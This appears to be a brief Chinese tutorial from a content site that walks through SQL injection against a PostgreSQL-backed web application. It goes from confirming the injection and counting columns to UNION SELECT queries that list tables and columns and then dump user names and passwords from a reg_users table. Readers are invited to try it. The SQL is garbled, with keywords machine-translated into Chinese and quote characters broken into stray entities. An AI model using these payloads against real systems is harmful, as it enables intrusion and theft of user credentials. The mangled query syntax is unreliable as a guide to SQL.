本篇内容主要讲解“postgreasql数据库注入的过程”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“postgreasql数据库注入的过程”吧!
一、判断是否存在注入
和1=2返回错误
和1=1返回正,常存在注入
和1::int=1返回正常说明是postgresql数据库
二,判断字段数量
命令5返回错误
命令4返回正常说明,有四列
三、联合查询
联盟选择& # 39;1 & # 39;& # 39;2 & # 39;& # 39;3 & # 39;& # 39;4 & # 39;可以看出2/3号位置显示
四,获取当前数据库
联盟选择& # 39;1 & # 39;current_database () & # 39; 3 & # 39; & # 39; 4 & # 39;
五,获取第一个表
联盟选择& # 39;1 & # 39;relname, & # 39; 3 & # 39; & # 39; 4 & # 39;得到,pg_stat_user_tables限制1抵消0
获取第二个表
联盟选择& # 39;1 & # 39;relname, relname, & # 39; 4 & # 39;得到,pg_stat_user_tables限制抵消1
六,获取第一个字段
联盟选择& # 39;1 & # 39;column_name, & # 39; 3 & # 39; & # 39; 4 & # 39;从information_schema。列table_name=& # 39; reg_users& # 39;限制1抵消0
获取第二个字段
联盟选择& # 39;1 & # 39;column_name, & # 39; 3 & # 39; & # 39; 4 & # 39;从information_schema。列table_name=& # 39; reg_users& # 39;限制抵消1
七,获取字段内容
联盟选择& # 39;1 & # 39;& # 39;& # 39;| |名称| | & # 39;,& # 39;| |密码| | & # 39;& # 39;& # 39;3 & # 39;& # 39;4 & # 39;得到,reg_users
到此,相信大家对“postgreasql数据库注入的过程”有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
